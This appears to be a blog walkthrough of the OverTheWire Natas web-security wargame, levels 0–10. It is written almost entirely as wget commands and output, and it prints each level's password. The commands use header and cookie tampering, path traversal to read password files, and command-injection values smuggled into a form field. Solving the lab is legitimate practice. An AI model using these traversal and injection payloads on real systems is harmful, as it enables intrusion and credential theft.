# Natas wargame: Level 0 to 10


Level 0

# wget --quiet -O - --user=natas0 --password=natas0 http://natas0.natas.labs.overthewire.org | grep natas1 | awk '{print $6}'
9hSaVoey44Puz0fbWlHtZh5jTooLVplC
Level 1

# wget --quiet -O - --user=natas1 --password=9hSaVoey44Puz0fbWlHtZh5jTooLVplC http://natas1.natas.labs.overthewire.org | grep natas2 | awk '{print $6}'
aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl
Level 2

# wget --quiet -O - --user=natas2 --password=aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl http://natas2.natas.labs.overthewire.org | grep files
<img src="files/pixel.png">
# wget --quiet -O - --user=natas2 --password=aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl http://natas2.natas.labs.overthewire.org/files
# wget --quiet -O - --user=natas2 --password=aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl http://natas2.natas.labs.overthewire.org/files/users.txt | grep natas3 | awk -F\: '{print $2}'
lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb
Level 3

# wget --quiet -O - --user=natas3 --password=lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb http://natas3.natas.labs.overthewire.org/robots.txt | grep Disallow
Disallow: /s3cr3t/
# wget --quiet -O - --user=natas3 --password=lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt | grep natas4 | awk -F\: '{print $2}'
8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz
Level 4

# wget --quiet -O - --user=natas4 --password=8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz --referer=http://natas5.natas.labs.overthewire.org/ http://natas4.natas.labs.overthewire.org | grep natas5 | awk '{print $8}'
V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z
Level 5

# wget --quiet -O - --user=natas5 --password=V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z --keep-session-cookies --save-cookies natas5.cookie http://natas5.natas.labs.overthewire.org
# sed -i 's/0$/1/' natas5.cookie
# wget --quiet -O - --user=natas5 --password=V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z --keep-session-cookies --load-cookies natas5.cookie http://natas5.natas.labs.overthewire.org | grep natas6 | awk '{print $8}' | awk -F\< '{print $1}'
mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU
Level 6

# wget --quiet -O - --user=natas6 --password=mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU http://natas6.natas.labs.overthewire.org/includes/secret.inc | grep secret | awk -F\" '{print $2}'
FOEIUWGHFEEUHOFUOIU
# wget --quiet -O - --user=natas6 --password=mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU --post-data 'submit=&secret=FOEIUWGHFEEUHOFUOIU' http://natas6.natas.labs.overthewire.org | grep natas7 | awk '{print $8}'
XLoIufz83MjpTrtPvP9iAtgF48EWjicU
Level 7

# wget --quiet -O - --user=natas7 --password=XLoIufz83MjpTrtPvP9iAtgF48EWjicU http://natas7.natas.labs.overthewire.org | grep natas8
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
# wget --quiet -O - --user=natas7 --password=XLoIufz83MjpTrtPvP9iAtgF48EWjicU http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8 | grep -v -e \< -e ^$
maabkdexUStb6JJXUqmBx7Re8M61cksn
Level 8

# wget --quiet -O - --user=natas8 --password=maabkdexUStb6JJXUqmBx7Re8M61cksn http://natas8.natas.labs.overthewire.org/index-source.html | sed -e 's/color/\n/g' | grep -m 1 DD0000 | awk -F\" '{print $3}'
3d3d516343746d4d6d6c315669563362
# echo -n "3d3d516343746d4d6d6c315669563362" | xxd -p -r | rev | base64 --decode && echo
oubWYf2kBq
Level 9

# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;/usr/bin/find / | /bin/grep natas10;' http://natas9.natas.labs.overthewire.org | grep natas10
/var/www/natas/natas10
/home/natas10
/home/natas10/.bashrc
/home/natas10/.bash_logout
/home/natas10/.profile
/etc/apache2/sites-available/VHOST.natas10.natas.labs.overthewire.org
/etc/apache2/sites-enabled/VHOST.natas10.natas.labs.overthewire.org
/etc/natas_webpass/natas10
# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;/bin/echo "#$(/bin/cat /etc/natas_webpass/natas10)#";' http://natas9.natas.labs.overthewire.org | awk -F\# '{print $2}' | grep -v ^$
s09byvi8880wqhbnonMFMW8byCojm8eA
Level 10

# wget --quiet -O - --user=natas10 --password=s09byvi8880wqhbnonMFMW8byCojm8eA --post-data 'submit=&needle=. /etc/natas_webpass/natas11 #"' http://natas10.natas.labs.overthewire.org | grep -v -e ^\< -e ^$ | tail -n 1
SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6

No comments: